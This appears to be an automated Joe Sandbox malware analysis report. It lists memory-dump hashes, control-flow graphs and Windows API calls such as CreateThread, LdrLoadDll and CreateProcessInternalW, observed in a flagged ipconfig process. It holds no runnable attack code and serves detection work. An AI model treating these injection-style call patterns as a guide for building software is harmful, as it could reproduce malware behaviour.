                                                                                              • Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: f439e4c0b432a55db8e3d2432d21a32885ceeee8eea8de233b9e134a277f9837
                                                                                              • Instruction ID: 41d068873013f47e439226c9312692b5253af4631e5bae211dd6d1604bde49c2
                                                                                              • Opcode Fuzzy Hash: f439e4c0b432a55db8e3d2432d21a32885ceeee8eea8de233b9e134a277f9837
                                                                                              • Instruction Fuzzy Hash: 1190027120580442D24071594444747000587D0301F55C011A50686B9E86598ED57665
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: ce1b1a408112148ab67c97b154d3a90c5c24ad1b9ea11ef2009f4c4a5ba56093
                                                                                              • Instruction ID: e6eced6a6f8160b8977d30cf97d3f1c4e895f3e8c7b42beee890b23884b635b1
                                                                                              • Opcode Fuzzy Hash: ce1b1a408112148ab67c97b154d3a90c5c24ad1b9ea11ef2009f4c4a5ba56093
                                                                                              • Instruction Fuzzy Hash: C3900221215C0082D30075694C54B07000587D0303F55C115A01586B9CC9158D616521
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 8d87836284f1b6da58071462a805591f1d05503b0a97b91d1590cb99ad4069c6
                                                                                              • Instruction ID: 9ece9e106c4e57378298e5dfd67d1653e7fdd4abc3b3a499b54993a60e17132b
                                                                                              • Opcode Fuzzy Hash: 8d87836284f1b6da58071462a805591f1d05503b0a97b91d1590cb99ad4069c6
                                                                                              • Instruction Fuzzy Hash: 2190026134580482D20071594454B070005C7E1301F55C015E10686B9D8619CD527126
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 751bccbd4a135c8b98762be8802a57a97a8c236a4cd4036e397f6aa0d9e3afc2
                                                                                              • Instruction ID: 7aff8c1c77137da337fd2c232f545fe9581589ffdd4710550bc2fa668e19c661
                                                                                              • Opcode Fuzzy Hash: 751bccbd4a135c8b98762be8802a57a97a8c236a4cd4036e397f6aa0d9e3afc2
                                                                                              • Instruction Fuzzy Hash: B290023120580442D20075995448747000587E0301F55D011A50286BAEC6658D917131
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 15429527ceba067abb3460f33dc5ad7b7a54045662ad1c4ccb330954ab0d6acd
                                                                                              • Instruction ID: 4459ccc8665fdb0600fb8653159d72facce46894b2802df968cebdc84e6901d0
                                                                                              • Opcode Fuzzy Hash: 15429527ceba067abb3460f33dc5ad7b7a54045662ad1c4ccb330954ab0d6acd
                                                                                              • Instruction Fuzzy Hash: 3990023120580882D20071594444B47000587E0301F55C016A01287B9D8615CD517521
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 58ead9fa50089488a9a54317d011903aa8b61194620c2ffb5fc8cb9931d1fe67
                                                                                              • Instruction ID: 2b228a171012e650e02b90346051c645da336e352edb864182fc80e16101c12d
                                                                                              • Opcode Fuzzy Hash: 58ead9fa50089488a9a54317d011903aa8b61194620c2ffb5fc8cb9931d1fe67
                                                                                              • Instruction Fuzzy Hash: 1490023120588842D2107159844474B000587D0301F59C411A44287BDD86958D917121
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 69d95d35bf871ec6dd6a70900c3b936fd8f0e179f4e4ef2d521b5af2d18e6bfb
                                                                                              • Instruction ID: 14f6346ef80e735840c88cae9f49e83b748f76fc0e5719033300892aaf83a146
                                                                                              • Opcode Fuzzy Hash: 69d95d35bf871ec6dd6a70900c3b936fd8f0e179f4e4ef2d521b5af2d18e6bfb
                                                                                              • Instruction Fuzzy Hash: FB900221246841925645B1594444607400697E0241795C012A1418AB5C85269D56E621
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 0feb85175936b5f04f574468b74b01d572096906bb0a245f70a9112761d3393a
                                                                                              • Instruction ID: 711e5a4f6f1f4d75b7442574c583fcb033122b5a2e441cad0cb9da01c14d05cc
                                                                                              • Opcode Fuzzy Hash: 0feb85175936b5f04f574468b74b01d572096906bb0a245f70a9112761d3393a
                                                                                              • Instruction Fuzzy Hash: 7190023120580453D21171594544707000987D0241F95C412A04286BDD96568E52B121
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 4c3a40ce6f883a008d485c0f86443221c970af332fc51d515ed5fa57c5171321
                                                                                              • Instruction ID: 180bf86142ca6a496bd093fbb7c8f24c67fdb50524b31754b16668792ddc5e73
                                                                                              • Opcode Fuzzy Hash: 4c3a40ce6f883a008d485c0f86443221c970af332fc51d515ed5fa57c5171321
                                                                                              • Instruction Fuzzy Hash: 3D90022921780042D2807159544870B000587D1202F95D415A00196BDCC9158D696321
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 82772345d7a9706e2052337e50ad9908a2b8b2cb24aa18d5074355ac0e647ca8
                                                                                              • Instruction ID: 72d3a5a73362eb0da07be5e9fb8e9942d3a290f62d757b5dc5cca0c659972942
                                                                                              • Opcode Fuzzy Hash: 82772345d7a9706e2052337e50ad9908a2b8b2cb24aa18d5074355ac0e647ca8
                                                                                              • Instruction Fuzzy Hash: E890023160990442D20071594554707100587D0201F65C411A04286BDD87958E5175A2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 243 1e9080-1e90af 244 1e90bb-1e90c2 243->244 245 1e90b6 call 1ebd40 243->245 246 1e919c-1e91a2 244->246 247 1e90c8-1e9118 call 1ebe10 call 1dacf0 call 1e4e50 244->247 245->244 254 1e9120-1e9131 Sleep 247->254 255 1e9196-1e919a 254->255 256 1e9133-1e9139 254->256 255->246 255->254 257 1e913b-1e9161 call 1e8ca0 256->257 258 1e9163-1e9183 256->258 260 1e9189-1e918c 257->260 258->260 261 1e9184 call 1e8eb0 258->261 260->255 261->260
                                                                                              APIs
                                                                                              • Sleep.KERNELBASE(000007D0), ref: 001E9128
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID: net.dll$wininet.dll
                                                                                              • API String ID: 3472027048-1269752229
                                                                                              • Opcode ID: 2fc5539ce258b5b6beccd941e799445f8f165c982dea3b187c6cdf1ac72fd1ad
                                                                                              • Instruction ID: 5b744e57fe39479e4cbf82da1214216b89f1d663388add70a2a4289cf74a5eae
                                                                                              • Opcode Fuzzy Hash: 2fc5539ce258b5b6beccd941e799445f8f165c982dea3b187c6cdf1ac72fd1ad
                                                                                              • Instruction Fuzzy Hash: 8A316FB2500685ABC724DF65C885FABB7B8BB48B00F10811DFA2E5B245DB34A650CBA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 263 1e9076-1e90c2 call 1ebd40 266 1e919c-1e91a2 263->266 267 1e90c8-1e9118 call 1ebe10 call 1dacf0 call 1e4e50 263->267 274 1e9120-1e9131 Sleep 267->274 275 1e9196-1e919a 274->275 276 1e9133-1e9139 274->276 275->266 275->274 277 1e913b-1e9161 call 1e8ca0 276->277 278 1e9163-1e9183 276->278 280 1e9189-1e918c 277->280 278->280 281 1e9184 call 1e8eb0 278->281 280->275 281->280
                                                                                              APIs
                                                                                              • Sleep.KERNELBASE(000007D0), ref: 001E9128
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID: net.dll$wininet.dll
                                                                                              • API String ID: 3472027048-1269752229
                                                                                              • Opcode ID: de2fc7c84ecfdab046a1dd564705555f856c7ef8b28b5c9f147e388a05ba431a
                                                                                              • Instruction ID: a2db5866c45ac6d52874309b2fa243ecfa03a822b340b88782898d3725f74d93
                                                                                              • Opcode Fuzzy Hash: de2fc7c84ecfdab046a1dd564705555f856c7ef8b28b5c9f147e388a05ba431a
                                                                                              • Instruction Fuzzy Hash: D021A2B1900785ABC714DF65C885BABBBB4BB48B00F10815DFA2D5B246D774A950CBA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 289 1ea66a-1ea686 290 1ea68c-1ea6a1 RtlFreeHeap 289->290 291 1ea687 call 1eaf60 289->291 291->290
                                                                                              APIs
                                                                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,001D3AF8), ref: 001EA69D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FreeHeap
                                                                                              • String ID: .z`
                                                                                              • API String ID: 3298025750-1441809116
                                                                                              • Opcode ID: dca94dd89a7ff1073f356e9cc4e0b44025c9e8db34db8b90f8117bea69c8e11b
                                                                                              • Instruction ID: 79459d5dc5100889a876c4b5e80a8d3f86f3d9bfce4fef0fbcd8ec9e69994bec
                                                                                              • Opcode Fuzzy Hash: dca94dd89a7ff1073f356e9cc4e0b44025c9e8db34db8b90f8117bea69c8e11b
                                                                                              • Instruction Fuzzy Hash: CEE04FB5200604AFD714DF69CC84EEB37AAEFD8350F128555FA1C97252C631E910CBB0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 292 1ea670-1ea6a1 call 1eaf60 RtlFreeHeap
                                                                                              APIs
                                                                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,001D3AF8), ref: 001EA69D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FreeHeap
                                                                                              • String ID: .z`
                                                                                              • API String ID: 3298025750-1441809116
                                                                                              • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                              • Instruction ID: 38ddd55d596ebbf43395349a09886790c6a70e3e1b42dc4d40bb9c2280a87932
                                                                                              • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                              • Instruction Fuzzy Hash: 8EE04FB1200208ABD714DF59CC45EAB77ACEF88750F118554FD0857241C630F910CAF0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 295 1d8308-1d831f 296 1d8328-1d835a call 1eca00 call 1dacf0 call 1e4e50 295->296 297 1d8323 call 1ebe60 295->297 304 1d835c-1d836e PostThreadMessageW 296->304 305 1d838e-1d8392 296->305 297->296 306 1d838d 304->306 307 1d8370-1d838b call 1da480 PostThreadMessageW 304->307 306->305 307->306
                                                                                              APIs
                                                                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 001D836A
                                                                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 001D838B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessagePostThread
                                                                                              • String ID:
                                                                                              • API String ID: 1836367815-0
                                                                                              • Opcode ID: 08e5002918a0815f30b35ee7c4d339c5fe196305e5db9d7d16ff0b47b1b6a60c
                                                                                              • Instruction ID: b1f08f6326d3d4b7f2fb2db1c6476fce2ddc87c7f537df347b19eea8fe0a4e58
                                                                                              • Opcode Fuzzy Hash: 08e5002918a0815f30b35ee7c4d339c5fe196305e5db9d7d16ff0b47b1b6a60c
                                                                                              • Instruction Fuzzy Hash: CA01D831A5062877E721A6949C43FFE772C6F50F51F040115FF08BA1C2EBD8690647E6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 001D836A
                                                                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 001D838B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessagePostThread
                                                                                              • String ID:
                                                                                              • API String ID: 1836367815-0
                                                                                              • Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                                                                              • Instruction ID: 3fe5d4af304619169aca7bdaa9ccd228fd08d39c81944d171b3e694e0880bdfd
                                                                                              • Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                                                                              • Instruction Fuzzy Hash: DD018F31A9022877E720A6959C43FBE776C6F50F50F040119FF08BA2C2EBA8690646E6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 520 1e91fd-1e91fe 521 1e91b6-1e91cb 520->521 522 1e9200-1e9216 520->522 523 1e91d1-1e91d8 521->523 524 1e91cc call 1e4e50 521->524 525 1e9218-1e9221 522->525 526 1e9233-1e923a 522->526 530 1e91da-1e91f6 call 1ef252 CreateThread 523->530 531 1e91f7-1e91fc 523->531 524->523 525->526 527 1e9223-1e922a 525->527 528 1e931d-1e9320 526->528 529 1e9240-1e9309 call 1ebde0 * 2 call 1ec0b0 call 1ebde0 call 1ec0b0 call 1ebde0 * 2 526->529 527->529 532 1e922c 527->532 529->528 549 1e930b-1e9314 529->549 532->526 549->528 550 1e9316 549->550 550->528
                                                                                              APIs
                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,001DF050,?,?,00000000), ref: 001E91EC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateThread
                                                                                              • String ID:
                                                                                              • API String ID: 2422867632-0
                                                                                              • Opcode ID: d7e66a0fd0e46a7025957f9718b4efbef03700ad3ac2b28073421fc65b9bd556
                                                                                              • Instruction ID: 8ab1c497b1ab7c06829c9890bf43ac56b8776738b4cad0bb9c940265d09aa59f
                                                                                              • Opcode Fuzzy Hash: d7e66a0fd0e46a7025957f9718b4efbef03700ad3ac2b28073421fc65b9bd556
                                                                                              • Instruction Fuzzy Hash: 9C41D4B2600B466BD728DF75CC86FEBB3A8BF50750F044519F5299B181DB70B910CBA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 551 1dacf0-1dad19 call 1ecc50 554 1dad1f-1dad2d call 1ed070 551->554 555 1dad1b-1dad1e 551->555 558 1dad3d-1dad4e call 1eb4a0 554->558 559 1dad2f-1dad3a call 1ed2f0 554->559 564 1dad67-1dad6a 558->564 565 1dad50-1dad64 LdrLoadDll 558->565 559->558 565->564
                                                                                              APIs
                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 001DAD62
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Load
                                                                                              • String ID:
                                                                                              • API String ID: 2234796835-0
                                                                                              • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                              • Instruction ID: 5c8fb783ba7d36d066783cc4babe1be8c78f8e92ccc23438f4e0a8ab58370123
                                                                                              • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                              • Instruction Fuzzy Hash: 4F015EB5D0020DABDF10EAE1DC42F9EB3789F14308F004595A90897241F731EB04CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 001EA734
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateInternalProcess
                                                                                              • String ID:
                                                                                              • API String ID: 2186235152-0
                                                                                              • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                              • Instruction ID: fe5432fad661051d232fa2c961e5f91934538ce51321436420422d6f2e6024d2
                                                                                              • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                              • Instruction Fuzzy Hash: A701AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241C630E851CBA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,001DF050,?,?,00000000), ref: 001E91EC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateThread
                                                                                              • String ID:
                                                                                              • API String ID: 2422867632-0
                                                                                              • Opcode ID: d8d341beacf55d3aadfcb46bdd6eb0ebc06c290d7a953d7ae1546744555f20b2
                                                                                              • Instruction ID: 318394a4e9e419ab45b265d05ba5baa1092a4a01ce8081cc22ccdd4c232d299f
                                                                                              • Opcode Fuzzy Hash: d8d341beacf55d3aadfcb46bdd6eb0ebc06c290d7a953d7ae1546744555f20b2
                                                                                              • Instruction Fuzzy Hash: 10E06D373807043AE320659AAC02FABB29C9B91B20F15002AFA0DEA2C1DA95F80142A5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,001DF050,?,?,00000000), ref: 001E91EC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateThread
                                                                                              • String ID:
                                                                                              • API String ID: 2422867632-0
                                                                                              • Opcode ID: fc490646e4c839dc7f1cdacfc301d162244f29ad5bce9bd96e34a3e84aaec4dd
                                                                                              • Instruction ID: 1ed612d51514f37f9a2b9199754d9862949640f500f2720981696855e476d92f
                                                                                              • Opcode Fuzzy Hash: fc490646e4c839dc7f1cdacfc301d162244f29ad5bce9bd96e34a3e84aaec4dd
                                                                                              • Instruction Fuzzy Hash: 55F0E5327807003ED3309A6A9C47FEB73A89FA0B10F24002DF609AB2C1CBA4F4424695
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,001DF1D2,001DF1D2,?,00000000,?,?), ref: 001EA800
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LookupPrivilegeValue
                                                                                              • String ID:
                                                                                              • API String ID: 3899507212-0
                                                                                              • Opcode ID: 95cb0380192baa6882f75abe5daef2f4b9407254435c44d4b055a1ac55a7d9ae
